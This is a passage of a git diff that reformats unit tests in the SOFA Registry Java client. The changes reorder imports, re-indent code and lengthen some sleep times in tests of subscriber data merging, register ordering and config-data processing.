org.powermock.api.mockito.PowerMockito; import org.powermock.core.classloader.annotations.PrepareForTest; import org.powermock.modules.junit4.PowerMockRunner; -import java.util.List; - -import static org.junit.Assert.assertNotNull; -import static org.mockito.Matchers.any; -import static org.mockito.Matchers.anyMapOf; -import static org.mockito.Matchers.anyString; -import static org.mockito.Mockito.mock; -import static org.mockito.Mockito.times; -import static org.mockito.Mockito.when; - /** - * * @author zhuoyu.sjw * @version $Id: DefaultServerManagerTest.java, v 0.1 2018-03-23 14:54 zhuoyu.sjw Exp $$ */ @@ -45,28 +43,28 @@ @PrepareForTest(HttpClientUtils.class) public class DefaultServerManagerTest { - @Test - public void initServerList() throws Exception { - // given - PowerMockito.mockStatic(HttpClientUtils.class); - RegistryClientConfig config = mock(RegistryClientConfig.class); + @Test + public void initServerList() throws Exception { + // given + PowerMockito.mockStatic(HttpClientUtils.class); + RegistryClientConfig config = mock(RegistryClientConfig.class); - // when - when(config.getSyncConfigRetryInterval()).thenReturn(100); - when( - HttpClientUtils.get(anyString(), anyMapOf(String.class, String.class), - any(RegistryClientConfig.class))).thenReturn("127.0.0.1:9600;127.0.0.2:9600"); + // when + when(config.getSyncConfigRetryInterval()).thenReturn(100); + when(HttpClientUtils.get( + anyString(), anyMapOf(String.class, String.class), any(RegistryClientConfig.class))) + .thenReturn("127.0.0.1:9600;127.0.0.2:9600"); - // then - ServerManager serverManager = new DefaultServerManager(config); + // then + ServerManager serverManager = new DefaultServerManager(config); - List serverList = serverManager.getServerList(); + List serverList = serverManager.getServerList(); - assertNotNull(serverList); + assertNotNull(serverList); - Thread.sleep(450); + Thread.sleep(450); - // verify - PowerMockito.verifyStatic(times(4)); - } -} \ No newline at end of file + // verify + PowerMockito.verifyStatic(times(4)); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultSubscriberTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultSubscriberTest.java index 44cc981dd..e6b3a29f9 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultSubscriberTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/DefaultSubscriberTest.java @@ -16,20 +16,19 @@ */ package com.alipay.sofa.registry.client.provider; +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertNull; +import static org.junit.Assert.assertTrue; + import com.alipay.sofa.registry.client.api.model.UserData; import com.alipay.sofa.registry.client.model.SegmentData; import com.alipay.sofa.registry.core.model.DataBox; -import org.junit.Test; - import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; import java.util.List; import java.util.Map; - -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertNull; -import static org.junit.Assert.assertTrue; +import org.junit.Test; /** * To test DefaultSubscriber. @@ -39,246 +38,243 @@ */ public class DefaultSubscriberTest { - public final String ZHEJIANG = "Zhejiang"; - public final String HANGZHOU = "Hangzhou"; - public final String NINGBO = "Ningbo"; - public final String WENZHOU = "Wenzhou"; - - public final String JIANGSU = "Jiangsu"; - public final String NANJING = "Nanjing"; + public final String ZHEJIANG = "Zhejiang"; + public final String HANGZHOU = "Hangzhou"; + public final String NINGBO = "Ningbo"; + public final String WENZHOU = "Wenzhou"; - public final String FUJIAN = "Fujian"; - public final String FUZHOU = "Fuzhou"; - public final String XIAMEN = "Xiamen"; + public final String JIANGSU = "Jiangsu"; + public final String NANJING = "Nanjing"; - public final String segmentA = "a"; + public final String FUJIAN = "Fujian"; + public final String FUZHOU = "Fuzhou"; + public final String XIAMEN = "Xiamen"; - public final String segmentB = "b"; + public final String segmentA = "a"; - @Test - public void testPutReceivedData() { + public final String segmentB = "b"; - String localZone = ZHEJIANG; + @Test + public void testPutReceivedData() { - DefaultRegistryClientConfig config = DefaultRegistryClientConfigBuilder.start().build(); - DefaultSubscriber defaultSubscriber = new DefaultSubscriber(null, null, config); + String localZone = ZHEJIANG; - UserData initUserData = defaultSubscriber.peekData(); + DefaultRegistryClientConfig config = DefaultRegistryClientConfigBuilder.start().build(); + DefaultSubscriber defaultSubscriber = new DefaultSubscriber(null, null, config); - assertNull(initUserData.getLocalZone()); - assertTrue(initUserData.getZoneData().isEmpty()); + UserData initUserData = defaultSubscriber.peekData(); - long versionA = 0; - long versionB = 0; + assertNull(initUserData.getLocalZone()); + assertTrue(initUserData.getZoneData().isEmpty()); - // 1. receive data normally - Map> map1 = new HashMap>(); - addToDataBoxMap(map1, ZHEJIANG, HANGZHOU); - SegmentData sd1 = new SegmentData(); - sd1.setSegment(segmentA); - sd1.setVersion(++versionA); - sd1.setData(map1); + long versionA = 0; + long versionB = 0; - defaultSubscriber.putReceivedData(sd1, localZone); - UserData userData1 = defaultSubscriber.peekData(); + // 1. receive data normally + Map> map1 = new HashMap>(); + addToDataBoxMap(map1, ZHEJIANG, HANGZHOU); + SegmentData sd1 = new SegmentData(); + sd1.setSegment(segmentA); + sd1.setVersion(++versionA); + sd1.setData(map1); - Map> expectedMap1 = new HashMap>(); - addToStringMap(expectedMap1, ZHEJIANG, HANGZHOU); + defaultSubscriber.putReceivedData(sd1, localZone); + UserData userData1 = defaultSubscriber.peekData(); - assertEquals(localZone, userData1.getLocalZone()); - assertZoneDataEquals(expectedMap1, userData1.getZoneData()); + Map> expectedMap1 = new HashMap>(); + addToStringMap(expectedMap1, ZHEJIANG, HANGZHOU); - // 2. receive data normally again - Map> map2 = new HashMap>(); - addToDataBoxMap(map2, ZHEJIANG, NINGBO, WENZHOU); - SegmentData sd2 = new SegmentData(); - sd2.setSegment(segmentA); - sd2.setVersion(++versionA); - sd2.setData(map2); + assertEquals(localZone, userData1.getLocalZone()); + assertZoneDataEquals(expectedMap1, userData1.getZoneData()); - defaultSubscriber.putReceivedData(sd2, localZone); - UserData userData2 = defaultSubscriber.peekData(); + // 2. receive data normally again + Map> map2 = new HashMap>(); + addToDataBoxMap(map2, ZHEJIANG, NINGBO, WENZHOU); + SegmentData sd2 = new SegmentData(); + sd2.setSegment(segmentA); + sd2.setVersion(++versionA); + sd2.setData(map2); - Map> expectedMap2 = new HashMap>(); - addToStringMap(expectedMap2, ZHEJIANG, NINGBO, WENZHOU); + defaultSubscriber.putReceivedData(sd2, localZone); + UserData userData2 = defaultSubscriber.peekData(); - assertEquals(localZone, userData2.getLocalZone()); - assertZoneDataEquals(expectedMap2, userData2.getZoneData()); + Map> expectedMap2 = new HashMap>(); + addToStringMap(expectedMap2, ZHEJIANG, NINGBO, WENZHOU); - // 3. illegal version - Map> map3 = new HashMap>(); - addToDataBoxMap(map3, ZHEJIANG, NINGBO); - SegmentData sd3 = new SegmentData(); - sd3.setSegment(segmentA); - sd3.setVersion(versionA); - sd3.setData(map3); + assertEquals(localZone, userData2.getLocalZone()); + assertZoneDataEquals(expectedMap2, userData2.getZoneData()); - defaultSubscriber.putReceivedData(sd3, localZone); - UserData userData3 = defaultSubscriber.peekData(); + // 3. illegal version + Map> map3 = new HashMap>(); + addToDataBoxMap(map3, ZHEJIANG, NINGBO); + SegmentData sd3 = new SegmentData(); + sd3.setSegment(segmentA); + sd3.setVersion(versionA); + sd3.setData(map3); - assertZoneDataEquals(expectedMap2, userData3.getZoneData()); + defaultSubscriber.putReceivedData(sd3, localZone); + UserData userData3 = defaultSubscriber.peekData(); - // 4. from another segment - Map> map4 = new HashMap>(); - addToDataBoxMap(map4, ZHEJIANG, HANGZHOU); - SegmentData sd4 = new SegmentData(); - sd4.setSegment(segmentB); - sd4.setVersion(++versionB); - sd4.setData(map4); + assertZoneDataEquals(expectedMap2, userData3.getZoneData()); - defaultSubscriber.putReceivedData(sd4, localZone); - UserData userData4 = defaultSubscriber.peekData(); + // 4. from another segment + Map> map4 = new HashMap>(); + addToDataBoxMap(map4, ZHEJIANG, HANGZHOU); + SegmentData sd4 = new SegmentData(); + sd4.setSegment(segmentB); + sd4.setVersion(++versionB); + sd4.setData(map4); - Map> expectedMap4 = new HashMap>(); - addToStringMap(expectedMap4, ZHEJIANG, HANGZHOU, NINGBO, WENZHOU); + defaultSubscriber.putReceivedData(sd4, localZone); + UserData userData4 = defaultSubscriber.peekData(); - assertZoneDataEquals(expectedMap4, userData4.getZoneData()); + Map> expectedMap4 = new HashMap>(); + addToStringMap(expectedMap4, ZHEJIANG, HANGZHOU, NINGBO, WENZHOU); - // 5. another segment, another zone - Map> map5 = new HashMap>(); - addToDataBoxMap(map5, JIANGSU, NANJING); - SegmentData sd5 = new SegmentData(); - sd5.setSegment(segmentB); - sd5.setVersion(++versionB); - sd5.setData(map5); + assertZoneDataEquals(expectedMap4, userData4.getZoneData()); - defaultSubscriber.putReceivedData(sd5, localZone); - UserData userData5 = defaultSubscriber.peekData(); + // 5. another segment, another zone + Map> map5 = new HashMap>(); + addToDataBoxMap(map5, JIANGSU, NANJING); + SegmentData sd5 = new SegmentData(); + sd5.setSegment(segmentB); + sd5.setVersion(++versionB); + sd5.setData(map5); - Map> expectedMap5 = new HashMap>(); - addToStringMap(expectedMap5, ZHEJIANG, NINGBO, WENZHOU); - addToStringMap(expectedMap5, JIANGSU, NANJING); + defaultSubscriber.putReceivedData(sd5, localZone); + UserData userData5 = defaultSubscriber.peekData(); - assertZoneDataEquals(expectedMap5, userData5.getZoneData()); + Map> expectedMap5 = new HashMap>(); + addToStringMap(expectedMap5, ZHEJIANG, NINGBO, WENZHOU); + addToStringMap(expectedMap5, JIANGSU, NANJING); - // 6. push empty - Map> map6 = new HashMap>(); - SegmentData sd6 = new SegmentData(); - sd6.setSegment(segmentA); - sd6.setVersion(++versionA); - sd6.setData(map6); + assertZoneDataEquals(expectedMap5, userData5.getZoneData()); - defaultSubscriber.putReceivedData(sd6, localZone); - UserData userData6 = defaultSubscriber.peekData(); + // 6. push empty + Map> map6 = new HashMap>(); + SegmentData sd6 = new SegmentData(); + sd6.setSegment(segmentA); + sd6.setVersion(++versionA); + sd6.setData(map6); - Map> expectedMap6 = new HashMap>(); - addToStringMap(expectedMap6, JIANGSU, NANJING); + defaultSubscriber.putReceivedData(sd6, localZone); + UserData userData6 = defaultSubscriber.peekData(); - assertZoneDataEquals(expectedMap6, userData6.getZoneData()); + Map> expectedMap6 = new HashMap>(); + addToStringMap(expectedMap6, JIANGSU, NANJING); - // 7. different segments without intersection - Map> map7 = new HashMap>(); - addToDataBoxMap(map7, ZHEJIANG, NINGBO, WENZHOU); - addToDataBoxMap(map7, FUJIAN, XIAMEN); + assertZoneDataEquals(expectedMap6, userData6.getZoneData()); - SegmentData sd7 = new SegmentData(); - sd7.setSegment(segmentA); - sd7.setVersion(++versionA); - sd7.setData(map7); + // 7. different segments without intersection + Map> map7 = new HashMap>(); + addToDataBoxMap(map7, ZHEJIANG, NINGBO, WENZHOU); + addToDataBoxMap(map7, FUJIAN, XIAMEN); - defaultSubscriber.putReceivedData(sd7, localZone); - UserData userData7 = defaultSubscriber.peekData(); + SegmentData sd7 = new SegmentData(); + sd7.setSegment(segmentA); + sd7.setVersion(++versionA); + sd7.setData(map7); - Map> expectedMap7 = new HashMap>(); - addToStringMap(expectedMap7, ZHEJIANG, NINGBO, WENZHOU); - addToStringMap(expectedMap7, JIANGSU, NANJING); - addToStringMap(expectedMap7, FUJIAN, XIAMEN); + defaultSubscriber.putReceivedData(sd7, localZone); + UserData userData7 = defaultSubscriber.peekData(); - assertZoneDataEquals(expectedMap7, userData7.getZoneData()); + Map> expectedMap7 = new HashMap>(); + addToStringMap(expectedMap7, ZHEJIANG, NINGBO, WENZHOU); + addToStringMap(expectedMap7, JIANGSU, NANJING); + addToStringMap(expectedMap7, FUJIAN, XIAMEN); - // 8. different segments with intersection - Map> map8 = new HashMap>(); - addToDataBoxMap(map8, ZHEJIANG, HANGZHOU); - addToDataBoxMap(map8, JIANGSU, NANJING); - addToDataBoxMap(map8, FUJIAN, FUZHOU); + assertZoneDataEquals(expectedMap7, userData7.getZoneData()); - SegmentData sd8 = new SegmentData(); - sd8.setSegment(segmentB); - sd8.setVersion(++versionB); - sd8.setData(map8); + // 8. different segments with intersection + Map> map8 = new HashMap>(); + addToDataBoxMap(map8, ZHEJIANG, HANGZHOU); + addToDataBoxMap(map8, JIANGSU, NANJING); + addToDataBoxMap(map8, FUJIAN, FUZHOU); - defaultSubscriber.putReceivedData(sd8, localZone); - UserData userData8 = defaultSubscriber.peekData(); + SegmentData sd8 = new SegmentData(); + sd8.setSegment(segmentB); + sd8.setVersion(++versionB); + sd8.setData(map8); - Map> expectedMap8 = new HashMap>(); - addToStringMap(expectedMap8, ZHEJIANG, HANGZHOU, NINGBO, WENZHOU); - addToStringMap(expectedMap8, JIANGSU, NANJING); - addToStringMap(expectedMap8, FUJIAN, FUZHOU, XIAMEN); + defaultSubscriber.putReceivedData(sd8, localZone); + UserData userData8 = defaultSubscriber.peekData(); - assertZoneDataEquals(expectedMap8, userData8.getZoneData()); + Map> expectedMap8 = new HashMap>(); + addToStringMap(expectedMap8, ZHEJIANG, HANGZHOU, NINGBO, WENZHOU); + addToStringMap(expectedMap8, JIANGSU, NANJING); + addToStringMap(expectedMap8, FUJIAN, FUZHOU, XIAMEN); - // 9. set available segments + assertZoneDataEquals(expectedMap8, userData8.getZoneData()); - List availableSegments9 = new ArrayList(); - availableSegments9.add(segmentB); - defaultSubscriber.setAvailableSegments(availableSegments9); + // 9. set available segments - UserData userData9 = defaultSubscriber.peekData(); + List availableSegments9 = new ArrayList(); + availableSegments9.add(segmentB); + defaultSubscriber.setAvailableSegments(availableSegments9); - Map> expectedMap9 = new HashMap>(); - addToStringMap(expectedMap9, ZHEJIANG, HANGZHOU); - addToStringMap(expectedMap9, JIANGSU, NANJING); - addToStringMap(expectedMap9, FUJIAN, FUZHOU); + UserData userData9 = defaultSubscriber.peekData(); - assertZoneDataEquals(expectedMap9, userData9.getZoneData()); + Map> expectedMap9 = new HashMap>(); + addToStringMap(expectedMap9, ZHEJIANG, HANGZHOU); + addToStringMap(expectedMap9, JIANGSU, NANJING); + addToStringMap(expectedMap9, FUJIAN, FUZHOU); - // 10. add available segments + assertZoneDataEquals(expectedMap9, userData9.getZoneData()); - List availableSegments10 = new ArrayList(); - availableSegments10.add(segmentA); - availableSegments10.add(segmentB); - defaultSubscriber.setAvailableSegments(availableSegments10); + // 10. add available segments - UserData userData10 = defaultSubscriber.peekData(); + List availableSegments10 = new ArrayList(); + availableSegments10.add(segmentA); + availableSegments10.add(segmentB); + defaultSubscriber.setAvailableSegments(availableSegments10); - assertZoneDataEquals(expectedMap8, userData10.getZoneData()); - } + UserData userData10 = defaultSubscriber.peekData(); - private void addToDataBoxMap(Map> map, String key, String... values) { - List list = map.get(key); - if (list == null) { - list = new ArrayList(); - map.put(key, list); - } - for (String value : values) { - DataBox dataBox = new DataBox(); - dataBox.setData(value); - list.add(dataBox); - } + assertZoneDataEquals(expectedMap8, userData10.getZoneData()); + } + private void addToDataBoxMap(Map> map, String key, String... values) { + List list = map.get(key); + if (list == null) { + list = new ArrayList(); + map.put(key, list); } - - private void addToStringMap(Map> map, String key, String... values) { - List list = map.get(key); - if (list == null) { - list = new ArrayList(); - map.put(key, list); - } - for (String value : values) { - list.add(value); - } - + for (String value : values) { + DataBox dataBox = new DataBox(); + dataBox.setData(value); + list.add(dataBox); } + } - private void assertZoneDataEquals(Map> a, Map> b) { - assertEquals(sortAllList(a), sortAllList(b)); + private void addToStringMap(Map> map, String key, String... values) { + List list = map.get(key); + if (list == null) { + list = new ArrayList(); + map.put(key, list); } - - private Map> sortAllList(Map> map) { - if (map == null) { - return null; - } - Map> copyMap = new HashMap>(); - for (Map.Entry> entry : map.entrySet()) { - if (entry.getValue() == null) { - copyMap.put(entry.getKey(), null); - } else { - List copyList = new ArrayList(entry.getValue()); - Collections.sort(copyList); - copyMap.put(entry.getKey(), copyList); - } - } - return copyMap; + for (String value : values) { + list.add(value); } + } + + private void assertZoneDataEquals(Map> a, Map> b) { + assertEquals(sortAllList(a), sortAllList(b)); + } -} \ No newline at end of file + private Map> sortAllList(Map> map) { + if (map == null) { + return null; + } + Map> copyMap = new HashMap>(); + for (Map.Entry> entry : map.entrySet()) { + if (entry.getValue() == null) { + copyMap.put(entry.getKey(), null); + } else { + List copyList = new ArrayList(entry.getValue()); + Collections.sort(copyList); + copyMap.put(entry.getKey(), copyList); + } + } + return copyMap; + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/RegisterOrderTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/RegisterOrderTest.java index 90117a8aa..cab9cdeea 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/RegisterOrderTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/provider/RegisterOrderTest.java @@ -16,6 +16,13 @@ */ package com.alipay.sofa.registry.client.provider; +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertFalse; +import static org.junit.Assert.assertNotNull; +import static org.junit.Assert.assertNull; +import static org.junit.Assert.assertTrue; +import static org.junit.Assert.fail; + import com.alipay.sofa.registry.client.api.Publisher; import com.alipay.sofa.registry.client.api.Subscriber; import com.alipay.sofa.registry.client.api.SubscriberDataObserver; @@ -26,22 +33,13 @@ import com.alipay.sofa.registry.core.model.DataBox; import com.alipay.sofa.registry.core.model.PublisherRegister; import com.alipay.sofa.registry.core.model.SubscriberRegister; +import java.util.List; import org.junit.After; import org.junit.Test; import org.slf4j.Logger; import org.slf4j.LoggerFactory; -import java.util.List; - -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertFalse; -import static org.junit.Assert.assertNotNull; -import static org.junit.Assert.assertNull; -import static org.junit.Assert.assertTrue; -import static org.junit.Assert.fail; - /** - * * To test all kinds of sequence of register action * * @author hui.shih @@ -49,176 +47,172 @@ */ public class RegisterOrderTest extends BaseTest { - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory.getLogger(DefaultRegistryClientTest.class); - - private String dataId = "com.alipay.sofa.registry.client.provider.RegisterOrderTest"; - - /** - * Teardown. - */ - @After - public void teardown() { - mockServer.stop(); - } - - @Test - public void publishFrequently() throws InterruptedException { - - String dataPrefix = "publishFrequently"; + /** LOGGER */ + private static final Logger LOGGER = LoggerFactory.getLogger(DefaultRegistryClientTest.class); - Publisher publisher = registryClient.register(new PublisherRegistration(dataId), - dataPrefix + 0); + private String dataId = "com.alipay.sofa.registry.client.provider.RegisterOrderTest"; - int republishCount = 100; - for (int i = 1; i <= republishCount; i++) { - publisher.republish(dataPrefix + i); - } + /** Teardown. */ + @After + public void teardown() { + mockServer.stop(); + } - Thread.sleep(1000L); + @Test + public void publishFrequently() throws InterruptedException { - DefaultPublisher defaultPublisher = (DefaultPublisher) publisher; - String registeId = defaultPublisher.getRegistId(); + String dataPrefix = "publishFrequently"; - // check client status - assertTrue(defaultPublisher.isRegistered()); - assertTrue(defaultPublisher.isEnabled()); - assertEquals(republishCount + 1, defaultPublisher.getPubVersion().intValue()); + Publisher publisher = + registryClient.register(new PublisherRegistration(dataId), dataPrefix + 0); - // check server status - List data = mockServer.queryPubliser(registeId).getDataList(); - assertEquals(1, data.size()); - assertEquals(dataPrefix + republishCount, data.get(0).getData()); + int republishCount = 100; + for (int i = 1; i <= republishCount; i++) { + publisher.republish(dataPrefix + i); } - @Test - public void unregisterAndRepublish() throws InterruptedException { + Thread.sleep(1000L); - String dataPrefix = "unregisterAndRepublish"; + DefaultPublisher defaultPublisher = (DefaultPublisher) publisher; + String registeId = defaultPublisher.getRegistId(); - // step 1 - Publisher publisher = registryClient.register(new PublisherRegistration(dataId), - dataPrefix + 0); - // step 2 - publisher.unregister(); + // check client status + assertTrue(defaultPublisher.isRegistered()); + assertTrue(defaultPublisher.isEnabled()); + assertEquals(republishCount + 1, defaultPublisher.getPubVersion().intValue()); - try { - // step 3 - publisher.republish(dataPrefix + 1); - fail("No exception thrown."); - } catch (Exception ex) { - // Must throw a RuntimeException - assertTrue(ex instanceof IllegalStateException); - } + // check server status + List data = mockServer.queryPubliser(registeId).getDataList(); + assertEquals(1, data.size()); + assertEquals(dataPrefix + republishCount, data.get(0).getData()); + } - Thread.sleep(1000L); + @Test + public void unregisterAndRepublish() throws InterruptedException { - assertTrue(publisher.isRegistered()); - assertFalse(publisher.isEnabled()); + String dataPrefix = "unregisterAndRepublish"; + // step 1 + Publisher publisher = + registryClient.register(new PublisherRegistration(dataId), dataPrefix + 0); + // step 2 + publisher.unregister(); + + try { + // step 3 + publisher.republish(dataPrefix + 1); + fail("No exception thrown."); + } catch (Exception ex) { + // Must throw a RuntimeException + assertTrue(ex instanceof IllegalStateException); } - @Test - public void publishAndUnregister() throws InterruptedException { + Thread.sleep(1000L); - String data = "publishAndUnregister"; + assertTrue(publisher.isRegistered()); + assertFalse(publisher.isEnabled()); + } - // step 1 - Publisher publisher = registryClient.register(new PublisherRegistration(dataId), data); + @Test + public void publishAndUnregister() throws InterruptedException { - Thread.sleep(500L); + String data = "publishAndUnregister"; - String registId = publisher.getRegistId(); - PublisherRegister publisherRegister = mockServer.queryPubliser(registId); + // step 1 + Publisher publisher = registryClient.register(new PublisherRegistration(dataId), data); - assertNotNull(publisherRegister); - assertEquals(data, publisherRegister.getDataList().get(0).getData()); + Thread.sleep(2000L); - // step 2 - publisher.unregister(); + String registId = publisher.getRegistId(); + PublisherRegister publisherRegister = mockServer.queryPubliser(registId); - Thread.sleep(500L); + assertNotNull(publisherRegister); + assertEquals(data, publisherRegister.getDataList().get(0).getData()); - assertNull(mockServer.queryPubliser(registId)); + // step 2 + publisher.unregister(); - } + Thread.sleep(2000L); - @Test - public void publishAndRefused() throws InterruptedException { + assertNull(mockServer.queryPubliser(registId)); + } - String data = "publishAndRefused"; + @Test + public void publishAndRefused() throws InterruptedException { - // step 1 - Publisher publisher = registryClient.register(new PublisherRegistration(data), data); + String data = "publishAndRefused"; - Thread.sleep(500L); + // step 1 + Publisher publisher = registryClient.register(new PublisherRegistration(data), data); - String registId = publisher.getRegistId(); - PublisherRegister publisherRegister = mockServer.queryPubliser(registId); + Thread.sleep(2000L); - assertNull(publisherRegister); + String registId = publisher.getRegistId(); + PublisherRegister publisherRegister = mockServer.queryPubliser(registId); - // step 2 - try { - publisher.republish(data); - } catch (Exception e) { - assertTrue(e instanceof IllegalStateException); - assertEquals("Publisher is refused by server. Try to check your configuration.", - e.getMessage()); - } + assertNull(publisherRegister); + + // step 2 + try { + publisher.republish(data); + } catch (Exception e) { + assertTrue(e instanceof IllegalStateException); + assertEquals( + "Publisher is refused by server. Try to check your configuration.", e.getMessage()); } + } - @Test - public void subscribeAndUnregister() throws InterruptedException { + @Test + public void subscribeAndUnregister() throws InterruptedException { - SubscriberDataObserver dataObserver = new SubscriberDataObserver() { - @Override - public void handleData(String dataId, UserData data) { - LOGGER.info("handle data, dataId: {}, data: {}", dataId, data); - } + SubscriberDataObserver dataObserver = + new SubscriberDataObserver() { + @Override + public void handleData(String dataId, UserData data) { + LOGGER.info("handle data, dataId: {}, data: {}", dataId, data); + } }; - // step 1 - Subscriber subscriber = registryClient.register(new SubscriberRegistration(dataId, - dataObserver)); + // step 1 + Subscriber subscriber = + registryClient.register(new SubscriberRegistration(dataId, dataObserver)); - Thread.sleep(500L); + Thread.sleep(2000L); - String registId = subscriber.getRegistId(); - SubscriberRegister subscriberRegister = mockServer.querySubscriber(registId); - assertNotNull(subscriberRegister); + String registId = subscriber.getRegistId(); + SubscriberRegister subscriberRegister = mockServer.querySubscriber(registId); + assertNotNull(subscriberRegister); - // step 2 - subscriber.unregister(); + // step 2 + subscriber.unregister(); - Thread.sleep(500L); + Thread.sleep(2000L); - assertNull(mockServer.queryPubliser(registId)); + assertNull(mockServer.queryPubliser(registId)); + } - } + @Test + public void subscribeAndRefused() throws InterruptedException { - @Test - public void subscribeAndRefused() throws InterruptedException { - - SubscriberDataObserver dataObserver = new SubscriberDataObserver() { - @Override - public void handleData(String dataId, UserData data) { - LOGGER.info("handle data, dataId: {}, data: {}", dataId, data); - } + SubscriberDataObserver dataObserver = + new SubscriberDataObserver() { + @Override + public void handleData(String dataId, UserData data) { + LOGGER.info("handle data, dataId: {}, data: {}", dataId, data); + } }; - // step 1 - Subscriber subscriber = registryClient.register(new SubscriberRegistration( - "subscribeAndRefused", dataObserver)); - - Thread.sleep(500L); + // step 1 + Subscriber subscriber = + registryClient.register(new SubscriberRegistration("subscribeAndRefused", dataObserver)); - String registId = subscriber.getRegistId(); - SubscriberRegister subscriberRegister = mockServer.querySubscriber(registId); - assertNull(subscriberRegister); + Thread.sleep(2000L); - assertTrue(subscriber instanceof AbstractInternalRegister); - assertTrue(((AbstractInternalRegister) subscriber).isRefused()); - } + String registId = subscriber.getRegistId(); + SubscriberRegister subscriberRegister = mockServer.querySubscriber(registId); + assertNull(subscriberRegister); -} \ No newline at end of file + assertTrue(subscriber instanceof AbstractInternalRegister); + assertTrue(((AbstractInternalRegister) subscriber).isRefused()); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/remoting/ReceivedConfigDataProcessorTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/remoting/ReceivedConfigDataProcessorTest.java index 6794e638b..c726098cf 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/remoting/ReceivedConfigDataProcessorTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/remoting/ReceivedConfigDataProcessorTest.java @@ -16,6 +16,10 @@ */ package com.alipay.sofa.registry.client.remoting; +import static org.mockito.Mockito.doThrow; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + import com.alipay.sofa.registry.client.api.Configurator; import com.alipay.sofa.registry.client.provider.DefaultConfigurator; import com.alipay.sofa.registry.client.provider.RegisterCache; @@ -23,59 +27,52 @@ import com.alipay.sofa.registry.core.model.DataBox; import com.alipay.sofa.registry.core.model.ReceivedConfigData; import com.alipay.sofa.registry.core.model.Result; +import java.util.Arrays; import org.junit.Assert; import org.junit.BeforeClass; import org.junit.Test; -import java.util.Arrays; - -import static org.mockito.Mockito.doThrow; -import static org.mockito.Mockito.mock; -import static org.mockito.Mockito.when; - -/** - * @author GengZhang - */ +/** @author GengZhang */ public class ReceivedConfigDataProcessorTest { - private static ReceivedConfigDataProcessor processor; + private static ReceivedConfigDataProcessor processor; - @BeforeClass - public static void init() { - RegisterCache registerCache = mock(RegisterCache.class); - ObserverHandler handler = mock(ObserverHandler.class); - Configurator configurator2 = mock(Configurator.class); - when(registerCache.getConfiguratorByRegistId("11")).thenReturn(null); - when(registerCache.getConfiguratorByRegistId("22")).thenReturn(configurator2); - DefaultConfigurator configurator3 = mock(DefaultConfigurator.class); - when(registerCache.getConfiguratorByRegistId("33")).thenReturn(configurator3); - doThrow(new RuntimeException()).when(handler).notify(configurator3); + @BeforeClass + public static void init() { + RegisterCache registerCache = mock(RegisterCache.class); + ObserverHandler handler = mock(ObserverHandler.class); + Configurator configurator2 = mock(Configurator.class); + when(registerCache.getConfiguratorByRegistId("11")).thenReturn(null); + when(registerCache.getConfiguratorByRegistId("22")).thenReturn(configurator2); + DefaultConfigurator configurator3 = mock(DefaultConfigurator.class); + when(registerCache.getConfiguratorByRegistId("33")).thenReturn(configurator3); + doThrow(new RuntimeException()).when(handler).notify(configurator3); - processor = new ReceivedConfigDataProcessor(registerCache, handler); - } + processor = new ReceivedConfigDataProcessor(registerCache, handler); + } - @Test - public void handleRequest() { - Result result = (Result) processor.handleRequest(null, null); - Assert.assertTrue(result.isSuccess()); - Assert.assertNull(result.getMessage()); + @Test + public void handleRequest() { + Result result = (Result) processor.handleRequest(null, null); + Assert.assertTrue(result.isSuccess()); + Assert.assertNull(result.getMessage()); - ReceivedConfigData request = new ReceivedConfigData(); - request.setDataBox(new DataBox()); - request.setVersion(1234L); - request.setConfiguratorRegistIds(null); - result = (Result) processor.handleRequest(null, request); - Assert.assertFalse(result.isSuccess()); - Assert.assertEquals("", result.getMessage()); + ReceivedConfigData request = new ReceivedConfigData(); + request.setDataBox(new DataBox()); + request.setVersion(1234L); + request.setConfiguratorRegistIds(null); + result = (Result) processor.handleRequest(null, request); + Assert.assertFalse(result.isSuccess()); + Assert.assertEquals("", result.getMessage()); - request.setConfiguratorRegistIds(Arrays.asList("11", "22", "33")); - result = (Result) processor.handleRequest(null, request); - Assert.assertTrue(result.isSuccess()); - Assert.assertNull(result.getMessage()); - } + request.setConfiguratorRegistIds(Arrays.asList("11", "22", "33")); + result = (Result) processor.handleRequest(null, request); + Assert.assertTrue(result.isSuccess()); + Assert.assertNull(result.getMessage()); + } - @Test - public void interest() { - Assert.assertEquals(ReceivedConfigData.class.getName(), processor.interest()); - } -} \ No newline at end of file + @Test + public void interest() { + Assert.assertEquals(ReceivedConfigData.class.getName(), processor.interest()); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/remoting/ReceivedDataProcessorTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/remoting/ReceivedDataProcessorTest.java index cbdd22ffa..3fa2fa1b5 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/remoting/ReceivedDataProcessorTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/remoting/ReceivedDataProcessorTest.java @@ -16,6 +16,10 @@ */ package com.alipay.sofa.registry.client.remoting; +import static org.mockito.Mockito.doThrow; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + import com.alipay.sofa.registry.client.api.Subscriber; import com.alipay.sofa.registry.client.provider.DefaultSubscriber; import com.alipay.sofa.registry.client.provider.RegisterCache; @@ -23,69 +27,62 @@ import com.alipay.sofa.registry.core.model.DataBox; import com.alipay.sofa.registry.core.model.ReceivedData; import com.alipay.sofa.registry.core.model.Result; -import org.junit.Assert; -import org.junit.BeforeClass; -import org.junit.Test; - import java.util.Arrays; import 